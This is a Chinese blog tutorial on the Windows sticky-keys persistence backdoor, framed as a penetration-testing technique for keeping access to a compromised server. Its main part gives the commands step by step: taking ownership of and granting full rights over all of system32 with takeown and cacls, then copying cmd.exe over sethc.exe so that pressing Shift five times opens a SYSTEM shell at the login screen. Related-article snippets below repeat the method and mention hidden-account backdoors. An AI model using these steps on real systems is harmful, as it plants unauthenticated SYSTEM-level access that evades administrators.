操作系统权限维持(一)之Windows系统-粘贴键后门

已于 2023-03-23 09:47:11 修改
阅读量538 收藏 3
点赞数 2
分类专栏: 操作系统权限维持 文章标签: windows 安全 网络 网络安全
于 2023-03-23 09:45:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/129724040
版权
前言

在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。

权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。

Web入侵流程
在这里插入图片描述

粘贴键后门

粘滞键概念

粘滞键漏洞,在Windows系统下连续按5下SHIFT键,可以启动系统的粘滞键功能,其进程名为Sethc.exe,应用程序在Windows\system32下

在这里插入图片描述

粘贴键后门原理

通过将其它应用程序(如:cmd.exe、 或木马、病毒)将Sethc.exe这个可执行程序进行替换。当再次连续按5次SHIFT键,就会以system权限运行替换后的应用程序

粘贴键后门演示

1、复制cmd.exe为sethc.exe

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

在这里插入图片描述

当我们去修改粘贴键作为后门时,Windows系统会以权限不够为由拒绝我们的操作,这时就需要我们去修改文件命令

2、需要更改文件权限,如下命令

takeown /f c:\windows\system32\*.* /a /r /d y 
cacls c:\windows\system32\*.* /T /E /G administrators:F 
两条命令均可

在这里插入图片描述

3、在命令运行完后,在执行第一条命令

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

在这里插入图片描述

这时我们的权限是够的

4、现在我们连按shift键五下后将弹出一个system权限的cmd窗口,作为后门

在这里插入图片描述

千负
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
粘滞利用总结
prettyX的博客
04-24 3282
粘滞 Windows系统下,启用粘滞盘快捷方式是按5次Shift 方法一 将sethc.exe(粘滞程序)替换成cmd.exe,这样在目标机登录页面连续按5下shift可调出cmd命令行 sethc路径:c:\windows\system32 这里有一个权限的问题需要注意,在Windows Vista版本之后的系统,当修改sethc.exe程序名字或将该程序剪切走时,会需要TrustedInstaller权限 TrustedInstaller权限,要高于Administrat
windows操作系统实验之粘滞漏洞
m0_55525922的博客
04-13 406
Windows系统登录界面状态下,粘滞仍可以以连续按5下SHIFT运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算。找到名字为sethc的文件(随便点击一个文件,按s就可以快速查找s开头的文件),也就是粘滞,把文件名改成任意名。选择计算机——d盘(也就是平时系统的c盘)————windows目录——System32目录,是计算机最高的权限,那么就可以输入命令修改账户的密码,或者新建一个用户,赋予它管理员的权限
Windows 安全基础
qq_39207066的博客
05-18 518
c) 安全日志,安全日志的默认状态是关闭的,用于记录登录上网和下网,改变访问权限以及系统的启动和关闭,日志的默认存储路径在%systemroot%\system32\config中,位于注册表的。a) 密码策略,这个可以在控制面板本地安全策略里面找到,设置的密码必需符合安全性要求,并且有效期默认为42天,其中所有的选择的都是可以自己设置的,包括密码的安全性要求的开关等。本地安全策略影响本地计算机的安全设置,当用户登录到系统时,就会受到本地安全策略的影响,他会限制用户的一些操作,如密码长度等等。
持久化 - Windows
bylfsj的博客
11-01 536
5.2. 持久化 - Windows¶ 5.2.1. 隐藏文件¶ 创建系统隐藏文件 attrib +s +a +r +h filename / attrib +s +h filename 利用NTFS ADS (Alternate Data Streams) 创建隐藏文件 利用Windows保留字 aux|prn|con|nul|com1|com2|com3|com4|com...
粘滞后门
sanqin_的博客
07-14 850
粘滞后门原理效果流程实操 原理   cmd.exe 覆盖 sethc.exe sethc.exeWindows的粘滞。是按5下shift后,windows就执行了system32下的sethc.exe。 效果   连按五次shift会打开cmd,而不是sethc 流程 cmd操作流程 进入system32 目录 更改目录拥有者,归于管理员组 cacls 更改文件的权限,为后面操作做铺垫 更改文件属性,让管理员对目录完全控制 备份sethc.exe以防不测 cmd.exe覆盖sethc.exe,此
windows图形化界)粘滞后门
m0_60936698的博客
03-02 479
windows图形化界)粘滞后门 思路:windows图形化界面未登入用户时,连按5次Shift粘滞的程序依然可以弹出,若若把粘滞的程序改为其他程序则有不一样的效果(如cmd程序)。 一、手动直接修改文件名 ①在windows 中C:\Windows\System32下找到sethc.exe(辅助功能快捷),发现无法直接修改文件名且提示《您需要TrustedInstaller提供的权限才能对此文件进行更改》,没有权限权限属于另一个用户组。 ②在管理员权限下修改se.
关于windows的粘滞后门漏洞
qq_52134654的博客
06-30 2497
该漏洞仅适用于Windows7及以下的windows操作系统。粘滞是一种快捷,是为同时按下两个或多个有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他的组合使用。启动粘滞可通过单击“开始→设置→控制面板→辅助功能选项”,在“盘”选项卡下选中“使用粘滞”来启动。或者连续按shift五次。开启粘滞的时候,任务栏右边的系统托盘区会出现粘滞图标。...
利用五次shift粘滞调用cmd程序
m0_69891673的博客
11-15 304
由于我用的虚拟机操作,所以找到D:\Windows\System32\setchc.exe和D:\Windows\System32\cmd.exe(如果是在真实机上面将D该为C),然后将原来的sethc.exe这个程序名改为sethc1.exe,将cmd.exe改为sethc.exe。重启之后会自动弹出一个显示框,选择启动启动修复,然后进入windows的修复界面会经过一段时间的等待。进入点击链接的文本,然后点击右上角的另存为,然后就可以修改和查看windows7上面所有的文件夹了。
操作系统权限维持(二)之Windows系统-克隆账号维持后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-25 1095
隐藏账户,顾名思义就是计算机上看不到的用户在一个用户名后面添加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持
Windows后门--教程(五)——shift粘贴后门
W小哥
03-16 3981
一、shift粘贴后门介绍 Shift粘滞是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。 (辅助功能镜像劫持是一样的原理) 二、shift粘贴后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows Server2012 IP: 192.168.2
Windows操作系统快捷
07-15
windows或CTRL+ESC 打开开始菜单。 CTRL+ALT+DELETE 打开任务管理器。 DELETE 删除被选择的选择项目,如果是文件,将被放入回收站。 SHIFT+DELETE 删除被选择的选择项目,如果是文件,将被直接删除...
基于js实现复制内容到操作系统粘贴板过程解析
12-13
//清空操作系统粘贴板 window.clipboardData.clearData(); //将需要复制的内容复制到操作系统粘贴板 window.clipboardData.setData("Text", "要复制的内容"); } 二、如果是其他浏览器,上面的办法行不通,其他...
zzu操作系统实验1-23报告
最新发布
01-24
操作系统》实验7记录粘贴与分割 《操作系统》实验8目录属性操作 《操作系统》实验9批处理操作接口1:赋值与取值 《操作系统》实验10批处理操作接口2获取数组长度、变量作用域 《操作系统》实验11批处理操作接口3...
图书管理系统C语言版-操作系统版.rar
06-20
在压缩包下存放的是图书管理系统课设报告以及在 centos 7 操作系统下开发的基于 C 语言开发的图书管理系统,开发环境为 centos 7 下的 gcc 编译器,本代码复制粘贴到该编译器下后,配置好必要的环境之后,便可以正常...
windows系统64位CUDNN-10.0安装包
11-21
Windows 7、8、8.1或10操作系统,必须是64位版本。 支持CUDA的NVIDIA显卡。您可以在NVIDIA官网上查找支持CUDA 10.0的显卡列表。 已经安装了CUDA 10.0工具包。 在下载CUDNN-10.0安装包后,您可以按照以下步骤进行安装...
域内权限维持思路总结
技术超强的网络安全平台
12-06 486
当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。Windows 操作系统常见持久性后门下面,我们先介绍几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘后门、注册表后门Windows 计划任务、Windows 新服务后门、WMI后门等等。Wind
Windows Server 2012 (2008) 忘记密码重置方法 Windows 10 忘记密码
weixin_30820151的博客
05-17 297
要使用windowsserver2012安装DVD,选择光盘引导进入 进入修复系统---命令提示符---切换目录至系统目录--执行move命令 先备份 utilman.exe(他就是这个程序见图片) 然后 move cmd.exe utilman.exe 更改完毕后重启计算机, 点击进入cmd 命令新建,解锁用户等操作。 net user adminis...
shift快捷
mingyqf的博客
02-18 309
shift快捷 Windows的粘滞------C:\windows\system32\sethc.exe,它本是为不方便按组合的人设计的 Windows系统按5下shift后,Windows就执行了system32下的sethc.exe,也就是启用了粘滞 在进程里可以看到是以当前用户的权限运行 但是当我们未登陆系统(停留在登陆界面)的时候 系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序
粘滞后门详述
发哥微课堂
03-07 8604
0x00:介绍 首先介绍一下粘滞,粘滞很多人都知道,windows 系统下连续按 5 次 shift 可调出其程序,但使用可能有一部分人不太了解,毕竟这个功能一般我们都用不到,粘滞是为了那些按钮有困难的人设计的,也可理解为残疾,就是按困难,一次只能按一个的这种需求,那么如果用 ctrl+c,ctrl+v 这种快捷或者其他需要组合的时,就会有困难,不具备一次按两个或多个的能力,那么...
操作系统之文件管理(一)移动文件答案educoder
12-05
操作系统中的文件管理是指对文件的创建、打开、读写、修改、删除等操作的管理。其中,移动文件是文件管理中的一项重要功能。 移动文件是指将文件从一个目录或位置移动到另一个目录或位置。这在我们整理文件、调整...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

千负

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值